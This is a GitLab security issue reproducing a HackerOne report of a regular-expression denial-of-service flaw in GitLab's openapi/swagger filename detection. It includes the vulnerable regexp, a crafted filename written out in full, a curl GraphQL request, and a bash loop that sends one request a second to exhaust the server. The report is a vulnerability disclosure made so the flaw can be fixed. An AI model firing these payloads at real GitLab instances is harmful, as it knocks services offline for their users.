ReDoS in openapi filename due to bad regexp in lib/gitlab/file_detector.rb

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2370737 by joaxcar on 2024-02-11, assigned to GitLab Team:

Report

Summary

When rendering blobs from files (for example, through GraphQL), GitLab will look for special filenames to handle in special ways. There is a list of regexps in lib/gitlab/file_detector.rb to help with detecting the files. One of the file types that GitLab tries to detect is openapi.yml or swagger files. The regexp used for this looks like this:

/[^/]*(openapi|swagger)[^/]*\.(yaml|yml|json)\z/  

This regexp is subject to catastrophic backtracking. A filename with this pattern will cause the regexp to break:

'e'.repeat(1041) + 'openapi'.repeat(1041) + '/swagger.yml'  

An attacker can create a malicious file and then run a series of GraphQL queries like this (replacing REGEXPNAME with the bad filename):

curl 'http://20.236.120.94/api/graphql' \
  -H 'Content-Type: application/json' \
  --data-raw $'{"query":"query getBlobInfo($projectPath: ID\u0021, $filePath: String\u0021, $ref: String\u0021, $refType: RefType, $shouldFetchRawText: Boolean\u0021) {project(fullPath: $projectPath) {repository {blobs(paths: [$filePath], ref: $ref, refType: $refType){nodes{rawTextBlob @include(if: $shouldFetchRawText),fileType}}}}}\\n","variables":{"projectPath":"root/test","filePath":"REGEXPNAME","ref":"main","refType":null,"shouldFetchRawText":true},"operationName":"getBlobInfo"}' \
  --compressed \
  --insecure

On a public project you can do these requests unauthenticated, but as I understand it the file needs to exist for the query to break due to backtracking.

I have tested this on a 1k example architecture and made the server unresponsive with 1 request a second.

Steps to reproduce

Use a locally hosted GitLab server.

  1. Log in to GitLab
  2. Create a new project (or use an existing one), make it public (for ease of attack)
  3. Create a file with this file name (it can be empty):
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapi
openapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopena
piopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiope
napiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapio
penapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapi/swagger.yml  
  4. To exhaust the server, run this script in a terminal (change the URL variable and the GROUPNAME/PROJECTNAME in the query to match your setup)
#!/bin/bash

# URL to which the curl request will be made
URL="https://gitlab.example.com"

# Duration for the loop to run: 1 minute (60 seconds)
DURATION=60

# Start time
START_TIME=$(date +%s)

# Loop until the duration is reached
while [ $(($(date +%s) - START_TIME)) -lt $DURATION ]; do
    # Make the curl request (in the background, so one request is sent every second)
    curl "$URL/api/graphql" \
  -H 'Content-Type: application/json' \
  --data-raw $'{"query":"query getBlobInfo($projectPath: ID\u0021, $filePath: String\u0021, $ref: String\u0021, $refType: RefType, $shouldFetchRawText: Boolean\u0021) {project(fullPath: $projectPath) {repository {blobs(paths: [$filePath], ref: $ref, refType: $refType){nodes{rawTextBlob [@]include(if: $shouldFetchRawText),fileType}}}}}\\n","variables":{"projectPath":"GROUPNAME/PROJECTNAME","filePath":"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiop
enapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapi
openapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopena
piopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiope
napiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapiopenapi/swagger.yml","ref":"main","refType":null,"shouldFetchRawText":true},"operationName":"getBlobInfo"}' &

    # Wait for 1 second  
    sleep 1  
done  
  5. SSH into the GitLab server and use top or htop to view the CPU usage
Impact

DoS of the GitLab instance and exhaustive resource consumption

What is the current bug behavior?

A malicious filename will make the regexp go into catastrophic backtracking.

What is the expected correct behavior?

Any filename should be safe.

How To Reproduce

Please add reproducibility information to this section: